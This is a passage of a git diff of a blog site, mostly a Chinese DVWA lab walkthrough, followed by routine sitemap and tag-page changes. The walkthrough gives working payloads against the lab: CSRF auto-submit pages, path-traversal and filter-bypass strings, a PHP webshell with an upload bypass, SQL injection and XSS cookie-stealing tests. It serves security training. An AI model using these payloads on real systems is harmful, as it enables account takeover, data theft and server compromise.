Changed.&lt;/pre&gt;"; &#125; else &#123; // Issue with passwords matching echo "&lt;pre&gt;Passwords did not match.&lt;/pre&gt;"; &#125; ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);&#125;?&gt; 服务器通过GET方式接收修改密码的请求，会检查参数password_new与password_conf是否相同，如果相同，就会修改密码，没有任何的防CSRF机制（当然服务器对请求的发送者是做了身份验证的，是检查的cookie，只是这里的代码没有体现）。 12345678910GET /vulnerabilities/csrf/?password_new=123&amp;password_conf=123456&amp;Change=Change HTTP/1.1Host: 192.168.31.84:81Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Referer: http://192.168.31.84:81/vulnerabilities/csrf/?password_new=password&amp;password_conf=123&amp;Change=ChangeAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: PHPSESSID=rbb91verhfhas5a6k7tq77bmo4; security=lowConnection: close 根据拦截的http请求，可以伪造如下链接让受害者点击，从而修改密码http://ip:port/vulnerabilities/csrf/?password_new=test&amp;password_conf=test&amp;Change=Change 更具隐藏性的方式：1.使用短链接来隐藏 URL：为了更加隐蔽，可以生成短网址链接，点击短链接，会自动跳转到真实网站：http://tinyurl.com/yd2gogtvPS:提供一个短网址生成网站2.构造攻击页面： 方式 1 通过img标签中的src属性来加载CSRF攻击利用的URL，并进行布局隐藏，实现了受害者点击链接则会将密码修改。 方式 2 查看页面html源代码，将关于密码操作的表单部分，通过javascript的onload事件加载和css代码来隐藏布局，按GET传递参数的方式，进一步构造html form表单，实现了受害者点击链接则会将密码修改。1234567891011121314151617181920&lt;body onload="javascript:csrf()"&gt;&lt;script&gt;function csrf()&#123;document.getElementById("button").click();&#125;&lt;/script&gt;&lt;style&gt;form&#123;display:none;&#125;&lt;/style&gt; &lt;form action="http://www.dvwa.com/vulnerabilities/csrf/?" method="GET"&gt; New password:&lt;br /&gt; &lt;input type="password" AUTOCOMPLETE="off" name="password_new" value="test"&gt;&lt;br /&gt; Confirm new password:&lt;br /&gt; &lt;input type="password" AUTOCOMPLETE="off" name="password_conf" value="test"&gt;&lt;br /&gt; &lt;br /&gt; &lt;input type="submit" id="button" name="Change" value="Change" /&gt; &lt;/form&gt;&lt;/body&gt; 构造攻击页面 现实攻击场景下，这种方法需要事先在公网上传一个攻击页面，诱骗受害者去访问，真正能够在受害者不知情的情况下完成CSRF攻击。这里为了方便演示，就在本地写一个test.html，下面是具体代码。 123&lt;img src=&quot;http://192.168.31.84:81/vulnerabilities/csrf/?password_new=111&amp;password_conf=111&amp;Change=Change# border=&quot;0&quot; style=&quot;display:none;&quot;/&gt;&lt;h1&gt;404&lt;/h1&gt;&lt;h2&gt;file not found.&lt;/h2&gt; 当受害者访问test.html时，会误认为是自己点击的是一个失效的url，但实际上已经遭受了CSRF攻击，密码已经被修改为了hack。 medium模式检查 HTTP_REFERER（http包头的Referer参数的值，表示来源地址）中是否包含SERVER_NAME（http包头的Host参数，及要访问的主机名，）12// Checks to see where the request came from if( stripos( $_SERVER[ &apos;HTTP_REFERER&apos; ] ,$_SERVER[ &apos;SERVER_NAME&apos; ]) !== false ) &#123; 想要通过验证，就必须保证在http请求中Referer字段中必须包含Host我们这需要把上面的攻击页面名字改成包含host就可以了。(把攻击页面放在服务器上) 文件包含easy模式某些Web应用程序允许用户指定直接用于文件流的输入，或允许用户将文件上载到服务器。稍后，Web应用程序访问Web应用程序上下文中的用户提供的输入。通过这样做，Web应用程序允许潜在的恶意文件执行。如果选择要包含的文件在目标计算机上是本地的，则称为“本地文件包含（LFI）。但是文件也可以包含在其他计算机上，然后攻击是”远程文件包含（RFI）。当RFI不是一种选择时。使用LFI的另一个漏洞（例如文件上传和目录遍历）通常可以达到同样的效果。注意，术语“文件包含”与“任意文件访问”或“文件公开”不同。只使用文件包含来阅读’../hackable/flags/fi.php’中的所有五个着名引号。123456&lt;?php// The page we wish to display$file = $_GET[ &apos;page&apos; ];?&gt; 文件包含漏洞的一般特征如下：12345?page=a.php?home=a.html?file=content 几种经典的测试方法：123456?file=../../../../../etc/passwdd?page=file:///etc/passwd?home=main.cgi?page=http://www.a.com/1.php=http://1.1.1.1/../../../../dir/file.txt（通过多个../可以让目录回到根目录中然后再进入目标目录） medium模式增加对绝对路径http和相对路径的检查123// Input validation$file = str_replace( array( &quot;http://&quot;, &quot;https://&quot; ), &quot;&quot;, $file );$file = str_replace( array( &quot;../&quot;, &quot;..\&quot;&quot; ), &quot;&quot;, $file ); 但依然可以使用?page=file:///etc/passwd以及重复字符过滤方法,构造url 构造url为 httphttp:// –&gt; http 构造url为 httphttp://:// –&gt;http:// 构造url为 …/./ –&gt; ../ 文件上传easy模式 上传的文件对Web应用程序构成重大风险。许多攻击的第一步是将一些代码提供给系统进行攻击。然后攻击者只需要找到一种方法来执行代码。使用文件上传有助于攻击者完成第一步。不受限制的文件上载的后果可能会有所不同，包括完整的系统接管，过载的文件系统，向后端系统转发攻击以及简单的污损。这取决于应用程序对上传文件的作用，包括存储位置。由于此文件上载漏洞，请在目标系统上执行您选择的任何PHP函数（例如phpinfo（）或system（））。 一句话木马1.php文件：123&lt;?phpecho shell_exec($_GET[&apos;cmd&apos;]);?&gt; 12345678910111213141516171819&lt;?phpif( isset( $_POST[ 'Upload' ] ) ) &#123; // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) &#123; // No echo '&lt;pre&gt;Your image was not uploaded.&lt;/pre&gt;'; &#125; else &#123; // Yes! echo "&lt;pre&gt;&#123;$target_path&#125; succesfully uploaded!&lt;/pre&gt;"; &#125;&#125;?&gt; medium模式增加了对文件类型和大小的过滤，只允许图片上传12345678// File information$uploaded_name = $_FILES[ &apos;uploaded&apos; ][ &apos;name&apos; ];$uploaded_type = $_FILES[ &apos;uploaded&apos; ][ &apos;type&apos; ];$uploaded_size = $_FILES[ &apos;uploaded&apos; ][ &apos;size&apos; ];// Is it an image?if( ( $uploaded_type == &quot;image/jpeg&quot; || $uploaded_type == &quot;image/png&quot; ) &amp;&amp; ( $uploaded_size &lt; 100000 ) ) &#123; 用burpsuite拦截修改Content-Type: application/octet-stream为Content-Type: image/jpeg。成功上传：http://192.168.31.84:81/hackable/uploads/1.php?cmd=ls SQL注入easy模式 SQL注入攻击包括通过从客户端到应用程序的输入数据插入或“注入”SQL查询。成功的SQL注入攻击可以从数据库中读取敏感数据，修改数据库数据（插入/更新/删除），对数据库执行管理操作（如关闭DBMS），恢复DBMS文件中存在的给定文件的内容system（load_file），在某些情况下向操作系统发出命令。SQL注入攻击是一种注入攻击，其中SQL命令被注入到数据平面输入中，以便实现预定义的SQL命令。这种攻击也可称为“SQLi”。 123456789101112131415161718192021222324&lt;?phpif( isset( $_REQUEST[ &apos;Submit&apos; ] ) ) &#123; // Get input $id = $_REQUEST[ &apos;id&apos; ]; // Check database $query = &quot;SELECT first_name, last_name FROM users WHERE user_id = &apos;$id&apos;;&quot;; $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;], $query ) or die( &apos;&lt;pre&gt;&apos; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &apos;&lt;/pre&gt;&apos; ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) &#123; // Get values $first = $row[&quot;first_name&quot;]; $last = $row[&quot;last_name&quot;]; // Feedback for end user echo &quot;&lt;pre&gt;ID: &#123;$id&#125;&lt;br /&gt;First name: &#123;$first&#125;&lt;br /&gt;Surname: &#123;$last&#125;&lt;/pre&gt;&quot;; &#125; mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]);&#125;?&gt; 在做查询操作时，未对$id做任何限制，直接传入了sql语句，造成字符型注入 原SELECT语句SELECT first_name, last_name FROM users WHERE user_id = &#39;$id&#39;;中的$id可以任意输入。当输入$id=123’ OR 1=1#时，SELECT语句变成了SELECT first_name, last_name FROM users WHERE user_id = &#39;123&#39; OR 1=1#&#39;;此时最后一个引号被#注释，同时1=1永远返回TRUE，这就导致所有用户的姓名泄露。123456789101112131415ID: 123&apos; OR 1=1#First name: adminSurname: adminID: 123&apos; OR 1=1#First name: GordonSurname: BrownID: 123&apos; OR 1=1#First name: HackSurname: MeID: 123&apos; OR 1=1#First name: PabloSurname: PicassoID: 123&apos; OR 1=1#First name: BobSurname: Smith 那如果想要得到密码该怎么做，UNION 操作符用于合并两个或多个 SELECT 语句的结果集，我们可以这样构造id$id=123&#39; or 1=1# union SELECT first_name,password FROM但貌似表里没有password12345678910111213141516usersID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: adminSurname: adminID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: GordonSurname: BrownID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: HackSurname: MeID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: PabloSurname: PicassoID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: BobSurname: Smith medium模式前端只能选择，前源码过滤了字符$id = mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;], $id);其中受影响的字符如下：1234567\x00\n\r\&apos;&quot;\x1a 但由于其为字符型注入，因此防御手段形同虚设构造id=1 or 1=1#即得到所有用户信息 SQL盲注 盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。1.判断是否存在注入，注入是字符型还是数字型2.猜解当前数据库名3.猜解数据库中的表名4.猜解表中的字段名5.猜解数据 12345678910111213141516171819202122232425262728&lt;?phpif( isset( $_GET[ 'Submit' ] ) ) &#123; // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num &gt; 0 ) &#123; // Feedback for end user echo '&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;'; &#125; else &#123; // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;'; &#125; ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);&#125;?&gt; 查看源码发现还是没有对id做过滤，但是它不会返回错误信息，只会告诉你User ID exists in the database.以及User ID is MISSING from the database. 盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注。如果手工盲注的话，需要对sql语法相当熟悉。类似：https://www.freebuf.com/articles/web/120985.html如果自动盲注的话，可以使用sqlmap来完成，类似：https://www.jianshu.com/p/ec2ca79e74b2 弱session-ideasy模式session-ID通常是在登录后作为特定用户访问站点所需的唯一内容，如果能够计算或轻易猜到该会话ID，则攻击者将有一种简单的方法来获取访问权限。无需知道账户密码或查找其他漏洞，如跨站点脚本。 根据源码可以看出来session每次加112345678910111213&lt;?php$html = "";if ($_SERVER['REQUEST_METHOD'] == "POST") &#123; if (!isset ($_SESSION['last_session_id'])) &#123; $_SESSION['last_session_id'] = 0; &#125; $_SESSION['last_session_id']++; $cookie_value = $_SESSION['last_session_id']; setcookie("dvwaSession", $cookie_value);&#125;?&gt; 按f12看application-cookies也能发现这个规律。然后使用hackbar这个扩展程序攻击。 medium模式从源码中可以看到dvwaSession就是时间戳123456789&lt;?php$html = &quot;&quot;;if ($_SERVER[&apos;REQUEST_METHOD&apos;] == &quot;POST&quot;) &#123; $cookie_value = time(); setcookie(&quot;dvwaSession&quot;, $cookie_value);&#125;?&gt; 基于DOM的XSSeasy模式 “跨站点脚本（XSS）”攻击是一种注入问题，其中恶意脚本被注入到其他良性和可信赖的网站中。当攻击者使用Web应用程序将恶意代码（通常以浏览器端脚本的形式）发送给不同的最终用户时，就会发生XSS攻击。允许这些攻击成功的缺陷非常普遍，并且发生在使用输出中的用户输入的Web应用程序的任何地方，而不验证或编码它。 攻击者可以使用XSS将恶意脚本发送给毫无戒心的用户。最终用户的浏览器无法知道该脚本不应该被信任，并将执行JavaScript。因为它认为脚本来自可靠来源，所以恶意脚本可以访问您的浏览器保留并与该站点一起使用的任何cookie，会话令牌或其他敏感信息。这些脚本甚至可以重写HTML页面的内容。 基于DOM的XSS是一个特殊情况，反映了JavaScript隐藏在URL中并在呈现时由页面中的JavaScript拉出而不是在服务时嵌入页面中。这可能使其比其他攻击更隐蔽，并且正在阅读页面主体的WAF或其他保护措施看不到任何恶意内容。 查看页面源代码12345678910111213&lt;script&gt; if (document.location.href.indexOf(&quot;default=&quot;) &gt;= 0) &#123; var lang = document.location.href.substring(document.location.href.indexOf(&quot;default=&quot;)+8); document.write(&quot;&lt;option value=&apos;&quot; + lang + &quot;&apos;&gt;&quot; + decodeURI(lang) + &quot;&lt;/option&gt;&quot;); document.write(&quot;&lt;option value=&apos;&apos; disabled=&apos;disabled&apos;&gt;----&lt;/option&gt;&quot;); &#125; document.write(&quot;&lt;option value=&apos;English&apos;&gt;English&lt;/option&gt;&quot;); document.write(&quot;&lt;option value=&apos;French&apos;&gt;French&lt;/option&gt;&quot;); document.write(&quot;&lt;option value=&apos;Spanish&apos;&gt;Spanish&lt;/option&gt;&quot;); document.write(&quot;&lt;option value=&apos;German&apos;&gt;German&lt;/option&gt;&quot;);&lt;/script&gt; indexOf() 方法可返回某个指定的字符串值在字符串中首次出现的位置。 substring() 方法用于提取字符串中介于两个指定下标之间的字符。 decodeURI() 函数可对 encodeURI() 函数编码过的 URI 进行解码 所以lang被赋值为”default=”之后的字串，如果插入js代码，插入的 javascript 代码可以在 decodeURL(lang) 被执行 http://192.168.31.84:81/vulnerabilities/xss_d/?default=English&lt;script&gt;alert(document.cookie)&lt;/script&gt;这个uri被用户点击之后会被弹窗，但是在chrome测试了很多次都不行，firefox就可以 medium模式相对于easy模式增加了对script的过滤12345# Do not allow script tagsif (stripos ($default, &quot;&lt;script&quot;) !== false) &#123; header (&quot;location: ?default=English&quot;); exit;&#125; 绕过有两种方式 方式1url中有一个字符为#，该字符后的数据不会发送到服务器端，从而绕过服务端过滤http://192.168.31.84:81/vulnerabilities/xss_d/?default=English#&lt;script&gt;alert(document.cookie)&lt;/script&gt; 方法2或者就是用img标签或其他标签的特性去执行js代码，比如img标签的onerror事件，构造连接(通过加载一个不存在的图片出错出发javascript onerror事件,继续弹框，证明出来有xss)123456789101112131415161718# 反射型xss## easy模式&gt; 反射型（非持久）：主要用于将恶意代码附加到URL地址的参数中，常用于窃取客户端cookie信息和钓鱼欺骗。查看源码，服务器直接把客户端的输入返回回来显示```php&lt;?phpheader (&quot;X-XSS-Protection: 0&quot;);// Is there any input?if( array_key_exists( &quot;name&quot;, $_GET ) &amp;&amp; $_GET[ &apos;name&apos; ] != NULL ) &#123; // Feedback for end user echo &apos;&lt;pre&gt;Hello &apos; . $_GET[ &apos;name&apos; ] . &apos;&lt;/pre&gt;&apos;;&#125;?&gt; http://192.168.31.84:81/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E medium模式源码里检查了script标签12// Get input $name = str_replace( &apos;&lt;script&gt;&apos;, &apos;&apos;, $_GET[ &apos;name&apos; ] ); str_replace这个函数是不区分大小写的，而且只替换一次改成大写就可以了&lt;SCRIPT&gt;alert(&#39;xss&#39;)&lt;/script&gt;或者嵌套&lt;scr&lt;script&gt;ipt&gt;alert(&#39;xss&#39;)&lt;/script&gt; 但对name审查没有这么严格，同样可以采用嵌套或大小写的方法：12&lt;scr&lt;script&gt;ipt&gt;alert(&apos;fuck&apos;)&lt;/script&gt;&lt;SCRIPT&gt;alert(&apos;fuck&apos;)&lt;/script&gt; 存储型xsseasy模式 “跨站点脚本（XSS）”攻击是一种注入问题，其中恶意脚本被注入到其他良性和可信赖的网站中。当攻击者使用Web应用程序将恶意代码（通常以浏览器端脚本的形式）发送给不同的最终用户时，就会发生XSS攻击。允许这些攻击成功的缺陷非常普遍，并且发生在使用输出中的用户输入的Web应用程序的任何地方，而不验证或编码它。 攻击者可以使用XSS将恶意脚本发送给毫无戒心的用户。最终用户的浏览器无法知道该脚本不应该被信任，并将执行JavaScript。因为它认为脚本来自可靠来源，所以恶意脚本可以访问您的浏览器保留并与该站点一起使用的任何cookie，会话令牌或其他敏感信息。这些脚本甚至可以重写HTML页面的内容。 XSS存储在数据库中。 XSS是永久性的，直到重置数据库或手动删除有效负载。 查看源码trim是去除掉用户输入内容前后的空格。stripslashes是去除反斜杠，两个只会去除一个。mysqli_real_escap_string过滤掉内容中特殊字符，像x00,n,r,,’,”,x1a等，来预防数据库攻击。12345678910111213141516171819202122&lt;?phpif( isset( $_POST[ 'btnSign' ] ) ) &#123; // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $message = ((isset($GLOBALS["___mysqli_ston"]) &amp;&amp; is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Sanitize name input $name = ((isset($GLOBALS["___mysqli_ston"]) &amp;&amp; is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Update database $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '&lt;pre&gt;' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '&lt;/pre&gt;' ); //mysql_close();&#125;?&gt; 插入之后会成为页面的元素显示出来&lt;div id=&quot;guestbook_comments&quot;&gt;Name: 11&lt;br /&gt;Message: 111&lt;br /&gt;&lt;/div&gt;看一下提交的方式：txtName=22&amp;mtxMessage=222&amp;btnSign=Sign+Guestbook直接插入script语句，txtName=22&lt;script&gt;alert(1)&lt;/script&gt;&amp;mtxMessage=222&amp;btnSign=Sign+Guestbook medium模式源码中增加了几个函数的使用：123* $message = strip_tags(addslashes($message)); 剥去字符串中的 HTML、XML 以及 PHP 的标签。* $message = htmlspecialchars( $message ); 把预定义的字符 &quot;&lt;&quot; （小于）和 &quot;&gt;&quot; （大于）转换为 HTML 实体：* $name = str_replace( &apos;&lt;script&gt;&apos;, &apos;&apos;, $name ); 绕过安全策略easy模式 内容安全策略（CSP）用于定义可以从中加载或执行脚本和其他资源的位置。本单元将引导您根据开发人员常见错误绕过策略。这些漏洞都不是CSP中的实际漏洞，它们是实施漏洞的漏洞。 12345678910111213141516171819202122&lt;?php$headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;"; // allows js from self, pastebin.com, jquery and google analytics.header($headerCSP);# https://pastebin.com/raw/R570EE00?&gt;&lt;?phpif (isset ($_POST['include'])) &#123;$page[ 'body' ] .= " &lt;script src='" . $_POST['include'] . "'&gt;&lt;/script&gt;";&#125;$page[ 'body' ] .= '&lt;form name="csp" method="POST"&gt; &lt;p&gt;You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:&lt;/p&gt; &lt;input size="50" type="text" name="include" value="" id="include" /&gt; &lt;input type="submit" value="Include" /&gt;&lt;/form&gt;'; 会在页面里增加一个body&lt;script src=&#39;&quot; . $_POST[&#39;include&#39;] . &quot;&#39;&gt;&lt;/script&gt;这里在源码中规定了信任的脚本源：script-src &#39;self&#39; https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;&quot;; // allows js from self, pastebin.com, jquery and google analytics.输入源码中提示的https://pastebin.com/raw/R570EE00，弹窗成功 medium模式如果你要使用 script 标签加载 javascript, 你需要指明其 nonce 值$headerCSP = &quot;Content-Security-Policy: script-src &#39;self&#39; &#39;unsafe-inline&#39; &#39;nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=&#39;;&quot;;比如：&lt;script nonce=&quot;TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=&quot;&gt;alert(1)&lt;/script&gt; JavaScript Attackseasy模式 本节中的攻击旨在帮助您了解JavaScript在浏览器中的使用方式以及如何操作它。攻击可以通过分析网络流量来进行，但这不是重点，也可能要困难得多。只需提交“成功”一词即可赢得关卡。显然，它并不那么容易，每个级别实现不同的保护机制，页面中包含的JavaScript必须进行分析，然后进行操作以绕过保护。 提示我们Submit the word “success” to win.但是输入success却返回Invalid token.说明token值不对劲，后台应该是比较输入的字符串与‘success’。查看源码发现token值是在前台计算的，md5(rot13(phrase))123456function generate_token() &#123; var phrase = document.getElementById(&quot;phrase&quot;).value; document.getElementById(&quot;token&quot;).value = md5(rot13(phrase));&#125;generate_token(); 然而，phrase的值等于ChangeMe&lt;input type=&quot;text&quot; name=&quot;phrase&quot; value=&quot;ChangeMe&quot; id=&quot;phrase&quot;&gt;因此计算出来的token也是不对的，我们在chrome的控制台直接计算12md5(rot13(&quot;success&quot;))&quot;38581812b435834ebf84ebcc2c6424d6&quot; 把值给隐藏的元素&lt;input type=&quot;hidden&quot; name=&quot;token&quot; value=&quot;8b479aefbd90795395b3e7089ae0dc09&quot; id=&quot;token&quot;&gt;然后提交success medium模式生成token的代码在js文件中1234567891011function do_something(e) &#123; for (var t = "", n = e.length - 1; n &gt;= 0; n--) t += e[n]; return t&#125;setTimeout(function () &#123; do_elsesomething("XX")&#125;, 300);function do_elsesomething(e) &#123; document.getElementById("token").value = do_something(e + document.getElementById("phrase").value + "XX")&#125; 输入success，然后控制台运行do_elsesomething(“XX”)就可以拿到token]]></content>
       <categories>
         <category>web</category>
       </categories>
diff --git a/sitemap.xml b/sitemap.xml
index 262831ae..046e3d41 100644
--- a/sitemap.xml
+++ b/sitemap.xml
@@ -4,14 +4,14 @@
   <url>
     <loc>https://cool-y.github.io/2019/07/24/%E8%8E%B7%E5%8F%96%E5%9B%BA%E4%BB%B6/</loc>
     
-    <lastmod>2019-07-24T03:50:46.543Z</lastmod>
+    <lastmod>2019-07-24T06:01:00.825Z</lastmod>
     
   </url>
   
   <url>
     <loc>https://cool-y.github.io/2019/07/24/web-dvwa/</loc>
     
-    <lastmod>2019-07-24T03:48:23.821Z</lastmod>
+    <lastmod>2019-07-24T06:00:56.862Z</lastmod>
     
   </url>
   
diff --git a/tags/AFL/index.html b/tags/AFL/index.html
index 3a591a4e..bd94f328 100644
--- a/tags/AFL/index.html
+++ b/tags/AFL/index.html
@@ -499,7 +499,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/CVE/index.html b/tags/CVE/index.html
index 1f5ccc06..a8f14a65 100644
--- a/tags/CVE/index.html
+++ b/tags/CVE/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/IoT/index.html b/tags/IoT/index.html
index 274fbaa6..9ff24ab0 100644
--- a/tags/IoT/index.html
+++ b/tags/IoT/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/MiniUPnP/index.html b/tags/MiniUPnP/index.html
index 14e94db9..4f2f2128 100644
--- a/tags/MiniUPnP/index.html
+++ b/tags/MiniUPnP/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/PE/index.html b/tags/PE/index.html
index 9fa457c4..fac645cb 100644
--- a/tags/PE/index.html
+++ b/tags/PE/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/QQ/index.html b/tags/QQ/index.html
index 4abb5927..c0d20691 100644
--- a/tags/QQ/index.html
+++ b/tags/QQ/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/SSH/index.html b/tags/SSH/index.html
index 3e44afa4..25a7a181 100644
--- a/tags/SSH/index.html
+++ b/tags/SSH/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/Samba/index.html b/tags/Samba/index.html
index 99d572f7..c7406ce9 100644
--- a/tags/Samba/index.html
+++ b/tags/Samba/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/TCPDUMP/index.html b/tags/TCPDUMP/index.html
index 8933a8d3..e5768954 100644
--- a/tags/TCPDUMP/index.html
+++ b/tags/TCPDUMP/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/USENIX/index.html b/tags/USENIX/index.html
index c5b05b2f..b2a317d3 100644
--- a/tags/USENIX/index.html
+++ b/tags/USENIX/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/Windows/index.html b/tags/Windows/index.html
index c94c6c51..12f71fed 100644
--- a/tags/Windows/index.html
+++ b/tags/Windows/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/ctf/index.html b/tags/ctf/index.html
index 012551ac..1c5ce10f 100644
--- a/tags/ctf/index.html
+++ b/tags/ctf/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/index.html b/tags/index.html
index 95ec5902..4ca15281 100644
--- a/tags/index.html
+++ b/tags/index.html
@@ -465,7 +465,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/itchat/index.html b/tags/itchat/index.html
index 10c88eec..04451efd 100644
--- a/tags/itchat/index.html
+++ b/tags/itchat/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/linux/index.html b/tags/linux/index.html
index ea5a6cd7..8e3318ff 100644
--- a/tags/linux/index.html
+++ b/tags/linux/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/miio/index.html b/tags/miio/index.html
index dd06ea6f..83a0f0fb 100644
--- a/tags/miio/index.html
+++ b/tags/miio/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/pwn/index.html b/tags/pwn/index.html
index ea0f82eb..b74bc99a 100644
--- a/tags/pwn/index.html
+++ b/tags/pwn/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/python/index.html b/tags/python/index.html
index 65d32db3..69b0beff 100644
--- a/tags/python/index.html
+++ b/tags/python/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/web/index.html b/tags/web/index.html
index 67e89aa6..97f4235a 100644
--- a/tags/web/index.html
+++ b/tags/web/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/wifi/index.html b/tags/wifi/index.html
